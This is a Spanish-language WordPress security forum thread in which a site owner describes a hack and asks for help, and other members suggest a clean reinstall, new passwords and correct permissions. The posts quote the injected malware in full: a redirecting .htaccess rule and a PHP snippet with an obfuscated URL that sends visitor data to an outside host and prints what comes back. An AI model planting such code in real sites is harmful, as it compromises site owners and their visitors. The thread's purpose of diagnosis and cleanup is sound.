Probable Hack en wordpress

Inicio Foros WordPress Seguridad Probable Hack en wordpress

Este debate contiene 7 respuestas, tiene 3 mensajes y lo actualizó  giObanii hace 5 años, 9 meses.

  • Autor
    Publicaciones
  • #67949

    giObanii
    Miembro

    Resulta que ayer en la noche estba revisando mi web y la verdad se veia muy mal como si no tuviera CSS y bueno dije talvez sea el servidor por que en ocaciones esa en mantenimiento y regularmente en la noches pero hoy en la mañana me vengo dando cuenta que al darle en algun enlace me llevava a otro sitio y bueno me puse a ver los archivos del blog y me encontre que en las carpetas themes, plugins, wp-admin, wp-content habia un archivo .htaccess  con las siguientes lineas:


    RewriteEngine On
    RewriteBase /
    RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
    RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
    RewriteRule ^.*$ http://celeirodoalgarvio.com/azzf.html?h=704574 [L,R]

    Y que esa misma linea era insertada en el .htaccess de raiz ademas de econtrarme con un archivo llamado main.ko.1696.js aqui esta su contenido: http://pastebin.com/dDbHCua9

    Alguna sugerencia a alguien le a cpasado algo similar que debo hacer…
    Saludos

  • #67957

    LGrusin
    Miembro

    Ninguna de esas carpetas viene con el archivo .htaccess

    Lo mejor es que busques una instalación limpia. El archivo .htaccess del raiz lo puedes regenerar otra vez desde el Escritorio o Panel de Control.

    Un saludo

  • #67958

    giObanii
    Miembro

    De hecho ya he eliminado los .htaccess que no tiene que estar y el archivo .js y mi web regreso a la normalidad pero me inquieta ese script que es lo que hace
    http://pastebin.com/dDbHCua9
    manda mi contraseña a un lugar o qe?

  • #67982

    giObanii
    Miembro

    Disculpen ya van dos ocaciones que me sucede algo peculiar resulta que me aparecen archivos .htaccess ahora con este contenido:

    RewriteEngine On
    RewriteBase /
    RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
    RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
    RewriteRule ^.*$ http://celeirodoalgarvio.com/azzf.html?h=704574 [L,R]

    ademas de incluir un archivo js con el contenido: http://pastebin.com/5cLd1aK7
    y el W3 Total Cache lo habia desactivado y se activo solo es un posible error de W3 Total Cache o un intento de hackear mi web alguien sabe de algo parecido.

  • #67983

    LGrusin
    Miembro

    Cambia contraseñas de acceso, WordPress, base de datos, FTP, etc, etc

    ¿Qué permitos tienen tus carpetas y archivos? ¿Qué permiso tiene .htaccess?

    Salvo casos muy concretos, WordPress aconseja 755 para todas las carpetas y 644 para todos los archivos.

    Un saludo

  • #67992

    giObanii
    Miembro

    mmm si de hecho pense eso mismo y me dedique a cambiar los permisos y hacer recomendacions de seguridad pero ahora resulto que mis archivo php ahia unas lineas de codigo como esta:

    if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
    $stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
    @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
    if ( $stCurlHandle !== NULL )
    {
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
    {$sResult[0]=" ";
    echo $sResult; // Statistic code end
    }
    curl_close($stCurlHandle);
    }
    }

  • #68316

    sergicaballero
    Participante

    Qué archivos php tienen estos códigos? quizá me esté pasando lo mismo…

  • #68318

    giObanii
    Miembro

    Bueno los archivos que tenian insertado ese codigo eran index.php y algunos de los de mi theme como single.php, index.php, page.php y otros la mayoria en los archivos del tama que estaba utilizando.

    Lo resolvi haciendo una nueva instalacion de WordPress e ir editando y limpiando todos los archivos php de mi theme ademas de reinstalar los plugin que estaba utiliando para evitar que estan infectados tambien. y asta ahora no me ha pasado de nuevo pero tengo una inquietud con el plugin Toltal Cache por que mientras lo tenia en mi sitio me pasaba lo mismo ya que lo elimine e hice los pasos anteriorres ya no me sucedio.

    Saludos..

El foro ‘Seguridad’ está cerrado y no se permiten nuevos debates ni respuestas.

Pin It on Pinterest

Ir al contenido